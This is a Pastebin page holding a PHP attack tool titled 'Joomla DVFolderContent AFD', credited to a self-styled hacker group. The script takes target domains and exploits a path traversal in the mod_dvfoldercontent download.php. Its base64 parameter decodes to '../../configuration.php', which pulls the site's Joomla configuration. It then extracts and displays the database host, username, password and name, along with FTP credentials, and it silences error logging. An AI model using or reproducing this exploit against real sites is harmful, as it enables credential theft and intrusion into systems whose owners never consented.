API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

Joomla DVFolderContent AFD

AZZATSSINS_CYBERSERK
Oct 3rd, 2016
329
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.08 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('display_errors', 0);
  7. @set_time_limit(0);
  8. /*
  9. Name app : Joomla DVFoldetContent (AFD)
  10. Author / Editor Script : AZZATSSINS CYBERSERKERS
  11. Email : cyberserkers@gmail.com
  12. */
  13. echo"<title>Joomla DVFolderContent AFD</title><center>
  14. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
  15. </b></i></u><br>
  16.     <form method='post'>
  17.     Domain: <br>
  18.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 30px;'></textarea><br>
  19.     <input type='submit' name='azzatssins' value='Ceck!'>
  20.     </form>";
  21. if($_POST['azzatssins']) {
  22.     $site = $_POST['url'];
  23.     $site = trim($site);
  24. foreach($site as $exploit){
  25. $ch = curl_init();
  26. curl_setopt($ch, CURLOPT_URL, "$exploit/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=");
  27. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  28. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  29. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  30. $xp = curl_exec ($ch);
  31. curl_close($ch);
  32.  if(preg_match("#class JConfig#",$xp)){
  33.      echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'> $exploit </font></legend><font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
  34.      preg_match("#tmp_path = '(.*?)\/tmp';#",$xp,$r);
  35.      echo "    [-] path of site : $r[1]/ </font></fieldset><br><br>";
  36.  
  37.      echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'>DATABASE ACCOUNT</font></legend><font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
  38.      preg_match("#host = '(.*?)';#",$xp,$r);echo "    [!] Host : $r[1] <br> ";
  39.      preg_match_all("#user = '(.*?)';#",$xp,$rr);echo "    [!] user : ".$rr[1][1]." <br> ";$aaa=$rr[1][1];
  40.      preg_match("#password = '(.*?)';#",$xp,$r);echo "    [!] password : $r[1] <br> ";fwrite($open,"pass : $r[1] <br>");
  41.      preg_match("#db = '(.*?)';#",$xp,$r);echo "    [!] Database : $r[1] <br></font></fieldset><br><br>";
  42.  
  43.      echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'>FTP ACCOUNT</font></legend>
  44. <font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
  45.      preg_match("#ftp_enable = '(.*?)';#",$xp,$r);echo "    [!] ftp enable : $r[1] <br> ";
  46.      preg_match("#ftp_host = '(.*?)';#",$xp,$r);echo "    [!] ftp_host : $r[1] <br> ";
  47.      preg_match("#ftp_port = '(.*?)';#",$xp,$r);echo "    [!] ftp port : $r[1] <br> ";
  48.      preg_match("#ftp_user = '(.*?)';#",$xp,$r);echo "    [!] ftp user : $r[1] <br> ";
  49.      preg_match("#ftp_pass = '(.*?)';#",$xp,$r);echo "    [!] ftp pass : $r[1] <br> ";
  50.      preg_match("#ftp_root = '(.*?)';#",$xp,$r);echo "    [!] ftp root : $r[1] <br> </font></fieldset><br><br>";
  51.   }else{
  52.     echo " <br> <center><font color=red>[-] $exploit [-]</font></center> <br> ";
  53.   }
  54. }
  55. }
  56.  
  57. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!